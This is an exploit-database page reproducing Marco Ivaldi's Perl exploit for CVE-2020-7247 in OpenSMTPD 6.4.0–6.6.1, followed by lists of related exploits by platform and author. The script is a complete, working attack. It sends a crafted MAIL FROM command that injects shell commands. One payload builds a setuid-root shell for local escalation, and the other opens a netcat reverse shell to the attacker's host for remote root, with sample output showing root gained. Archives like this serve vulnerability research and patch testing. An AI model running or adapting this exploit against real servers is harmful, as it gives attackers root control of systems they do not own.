Search for hundreds of thousands of exploits

"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

freebsd

Release date

Exploit published date

2020-02-11

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation
# Date: 2020-02-02
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.opensmtpd.org/
# Version: OpenSMTPD 6.4.0 - 6.6.1
# Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1
# CVE: CVE-2020-7247

#!/usr/bin/perl

#
# raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD
# Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and
# other products, allows remote attackers to execute arbitrary commands as root
# via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL
# FROM field. This affects the "uncommented" default configuration. The issue
# exists because of an incorrect return value upon failure of input validation
# (CVE-2020-7247).
#
# "Wow. I feel all butterflies in my tummy that bugs like this still exist. 
# That's awesome :)" -- skyper
#
# This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to
# root on OpenBSD in the default configuration, or execute remote commands as 
# root (only in OpenSMTPD "uncommented" default configuration).
#
# See also:
# https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
# https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/
# https://www.kb.cert.org/vuls/id/390745/
# https://www.opensmtpd.org/security.html
#
# Usage (LPE):
# phish$ uname -a
# OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64
# phish$ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel)
# phish$ ./raptor_opensmtpd.pl LPE
# [...]
# Payload sent, please wait 5 seconds...
# -rwsrwxrwx  1 root  wheel  12432 Feb  1 21:20 /usr/local/bin/pwned
# phish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Usage (RCE):
# raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org
# [...]
# Payload sent, please wait 5 seconds...
# /bin/sh: No controlling tty (open /dev/tty: Device not configured)
# /bin/sh: Can't find tty file descriptor
# /bin/sh: warning: won't have full job control
# phish# id
# uid=0(root) gid=0(wheel) groups=0(wheel)
#
# Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1):
# OpenBSD 6.6 [tested]
# OpenBSD 6.5 [untested]
# OpenBSD 6.4 [untested]
# Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested]
# Other Linux distributions [untested]
# FreeBSD [untested]
# NetBSD [untested]
# 

use IO::Socket::INET;

print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n";
print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n";

$usage = "Usage:\n".
"$0 LPE\n".
"$0 RCE <remote_host> <local_host> [<domain>]\n";
$lport = 4444;

($type, $rhost, $lhost, $domain) = @ARGV;
die $usage if (($type ne "LPE") && ($type ne "RCE"));

# Prepare the payload
if ($type eq "LPE") { # LPE
	$payload = "cp /bin/sh /usr/local/bin/pwned\n".
	"echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n".
	"gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned";
	$rhost = "127.0.0.1";
} else { # RCE
	die $usage if ((not defined $rhost) || (not defined $lhost));
	$payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|".
	"nc $lhost $lport >/tmp/f";
}

# Open SMTP connection
$| = 1;
$s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n";

# Read SMTP banner
$r = <$s>;
print "< $r";
die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/);

# Send HELO
$w = "HELO fnord";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send evil MAIL FROM
$w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send RCPT TO
if (not defined $domain) {
	$rcpt = "<root>";
} else {
	$rcpt = "<root\@$domain>";
}
$w = "RCPT TO:$rcpt";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send payload in DATA
$w = "DATA";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
$w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n.";
#print "> $w\n"; # uncomment for debugging
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Close SMTP connection
$s->close();
print "\nPayload sent, please wait 5 seconds...\n";

# Got root?
if ($type eq "LPE") { # LPE
	sleep 5;
	print `ls -l /usr/local/bin/pwned`;
	exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n";
} else { # RCE
	exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat
	#exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat
}
Release DateTitleTypePlatformAuthor
2020-04-06"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting"webappsfreebsd"Matthew Aberegg"
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2019-12-30"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation"localfreebsd"Karsten König"
2019-12-30"FreeBSD-SA-19:02.fd - Privilege Escalation"localfreebsd"Karsten König"
2019-07-10"FreeBSD 12.0 - 'fd' Local Privilege Escalation"localfreebsdgr4yf0x
2016-01-25"FreeBSD SCTP ICMPv6 - Error Processing"dosfreebsdptsecurity
2015-01-29"FreeBSD - Multiple Vulnerabilities"dosfreebsd"Core Security"
2013-10-04"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation"localfreebsdCurcolHekerLink
2013-06-26"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)"localfreebsdMetasploit
2013-06-21"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation"localfreebsdHunger
Release DateTitleTypePlatformAuthor
2020-04-21"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation"localsolaris"Marco Ivaldi"
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2019-10-21"Solaris 11.4 - xscreensaver Privilege Escalation"localsolaris"Marco Ivaldi"
2019-10-16"Solaris xscreensaver 11.4 - Privilege Escalation"localsolaris"Marco Ivaldi"
2019-06-17"Exim 4.87 - 4.91 - Local Privilege Escalation"locallinux"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2019-01-14"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)"localsolaris"Marco Ivaldi"
2018-11-30"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation"localopenbsd"Marco Ivaldi"
2018-10-30"xorg-x11-server 1.20.3 - Privilege Escalation"localopenbsd"Marco Ivaldi"
2009-09-11"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug"localaix"Marco Ivaldi"
2008-03-10"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak"localsolaris"Marco Ivaldi"
2007-04-04"TrueCrypt 4.3 - 'setuid' Local Privilege Escalation"localwindows"Marco Ivaldi"
2007-02-13"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack"remotemultiple"Marco Ivaldi"
2007-02-13"Lotus Domino R6 Webmail - Remote Password Hash Dumper"remotewindows"Marco Ivaldi"
2007-02-06"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution"remotewindows"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'utl_file' FileSystem Access"remotelinux"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'extproc' Local/Remote Command Execution"remotemultiple"Marco Ivaldi"
2006-11-23"Oracle 9i/10g - 'read/write/execute' ation Suite"remotemultiple"Marco Ivaldi"
2006-10-24"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)"localsolaris"Marco Ivaldi"
2006-10-24"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-16"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-13"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-10-13"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-09-13"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak"localsolaris"Marco Ivaldi"
2006-07-18"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation"locallinux"Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48051/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.